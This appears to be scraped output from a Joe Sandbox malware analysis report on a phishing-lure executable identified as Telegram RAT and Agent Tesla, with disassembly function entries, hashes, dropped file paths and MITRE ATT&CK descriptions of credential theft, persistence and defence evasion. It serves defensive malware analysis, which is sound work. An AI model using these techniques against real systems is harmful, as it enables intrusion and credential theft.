Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 1765eb4b06e63b2e65c4b1f4b5dad1f8b583ce328456529dafe5b3c3ea1a2dbc
Instruction ID: 50399788bcb4cf98a0eaf75b3f5be6e64fa2fb89010567d2894b993139095497
Opcode Fuzzy Hash: 1765eb4b06e63b2e65c4b1f4b5dad1f8b583ce328456529dafe5b3c3ea1a2dbc
Instruction Fuzzy Hash: B5D05B323C532833D21532A97D07FDD75C88F15F55F044466FB48555D38EE259C242E9

Uniqueness

Uniqueness Score: -1.00%

Function 00BEB511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00BEB564: _memset.LIBCMT ref: 00BEB571

Part of subcall function 00BD0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00BEB540,?,?,?,00BB100A), ref: 00BD0B89

IsDebuggerPresent.KERNEL32(?,?,?,00BB100A), ref: 00BEB544
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BB100A), ref: 00BEB553

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00BEB54E

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 3b9ab5a035416ed793176b53fa6c0167bb4b6d73bdb7e88e80c7637774287a6d
Instruction ID: 2421cfa6a0f48285f01f56019cc6a36088b08ae8325dc9d036aed3ee5010ff4e
Opcode Fuzzy Hash: 3b9ab5a035416ed793176b53fa6c0167bb4b6d73bdb7e88e80c7637774287a6d
Instruction Fuzzy Hash: 2BE06DB4620751CFD760EF29E514B577BE0AB14705F0089ADE886C2661E7F4D448CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C35BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C35BF5
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C35C08

Part of subcall function 00C154E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C1555E

Strings

Shell_TrayWnd, xrefs: 00C35BEE

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 573f9e41719f103ff309e3e66f927f7938fa30f700bf23d534efbafd0afbae72
Instruction ID: dbbb719e3ce9f71ca3da67498ced2d6a94eb0ca37c6c2d2d5f3999289e010684
Opcode Fuzzy Hash: 573f9e41719f103ff309e3e66f927f7938fa30f700bf23d534efbafd0afbae72
Instruction Fuzzy Hash: C8D0A932798300B6E334AB30AC0BFDB2A20AB01B00F000C38B205AA0E0C8E45801CA00

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Case_Your company bad driver Vehicle No.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aut4F39.tmp

C:\Users\user\AppData\Local\Temp\aut4F78.tmp

C:\Users\user\AppData\Local\Temp\aut5498.tmp

C:\Users\user\AppData\Local\Temp\aut54F6.tmp

C:\Users\user\AppData\Local\Temp\aut5AD0.tmp

C:\Users\user\AppData\Local\Temp\aut5B1F.tmp

C:\Users\user\AppData\Local\Temp\aut8973.tmp

C:\Users\user\AppData\Local\Temp\aut89A3.tmp

C:\Users\user\AppData\Local\Temp\hepatoduodenostomy

C:\Users\user\AppData\Local\Temp\phytographical

Windows Analysis Report
Case_Your company bad driver Vehicle No.exe

Function 00BB3B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00BB4AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00BB4FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 00C193DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre